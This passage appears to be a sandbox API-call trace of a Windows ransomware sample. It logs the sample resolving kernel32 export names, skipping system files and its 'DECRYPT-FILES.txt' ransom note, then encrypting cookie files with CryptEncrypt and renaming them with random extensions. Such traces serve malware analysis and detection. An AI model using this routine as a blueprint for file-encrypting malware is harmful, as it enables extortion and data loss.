lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.695] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.695] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.695] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.695] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.695] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.695] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.695] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.695] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.695] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.695] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.695] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.695] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.696] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.696] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt") returned 116 [0079.696] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n") returned 123 [0079.696] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9FhO2n" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.9fho2n"), dwFlags=0x0) returned 1 [0079.696] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.697] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.697] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.698] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4523d1d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x526fc010, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x526fc010, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x402, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@www.msn[2].txt", cAlternateFileName="5PD551~1.TXT")) returned 1 [0079.698] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.698] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="autorun.inf") returned -1 [0079.698] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="boot.ini") returned -1 [0079.698] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="desktop.ini") returned -1 [0079.698] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="ntuser.dat") returned -1 [0079.698] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="iconcache.db") returned -1 [0079.698] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="bootsect.bak") returned -1 [0079.698] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="ntuser.dat.log") returned -1 [0079.698] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="thumbs.db") returned -1 [0079.698] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.msn[2].txt", lpString2="Bootfont.bin") returned -1 [0079.698] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@www.msn[2].txt") returned 35 [0079.698] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.698] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.698] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.698] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.698] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.698] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@www.msn[2].txt") returned 35 [0079.698] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.698] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@www.msn[2].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt" [0079.698] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.699] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=1026) returned 1 [0079.699] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.699] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.705] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.705] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.705] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.705] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.706] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.706] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.706] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.706] CloseHandle (hObject=0x464) returned 1 [0079.706] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.706] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.707] CloseHandle (hObject=0x0) returned 0 [0079.707] CloseHandle (hObject=0x460) returned 1 [0079.708] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.708] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.709] GetTickCount () returned 0x114c6aa [0079.709] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.709] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.709] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.709] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.709] lstrlenA (lpString="kernel32.dll") returned 12 [0079.710] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.710] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.710] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.710] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.710] lstrlenA (lpString="ADDATOMA") returned 8 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.710] lstrlenA (lpString="ADDATOMW") returned 8 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.710] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.710] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.710] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.710] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.710] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.710] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.710] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.710] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.710] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.710] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.711] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.711] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.711] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.711] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.711] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.711] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.711] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.711] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.711] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.711] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.711] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.711] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.711] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.711] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.711] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.711] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.711] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.711] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.711] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.711] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.712] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.712] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.712] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.712] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.712] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.712] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.712] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.712] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.712] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.712] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.712] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.712] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.712] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.713] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.713] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.713] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.713] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.713] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.713] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.713] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.713] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.713] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.713] lstrlenA (lpString="BEEP") returned 4 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.713] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.713] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.713] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.713] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.713] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.713] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.713] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.713] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.714] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.714] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.714] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.714] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.714] lstrlenA (lpString="CANCELIO") returned 8 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.714] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.714] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, 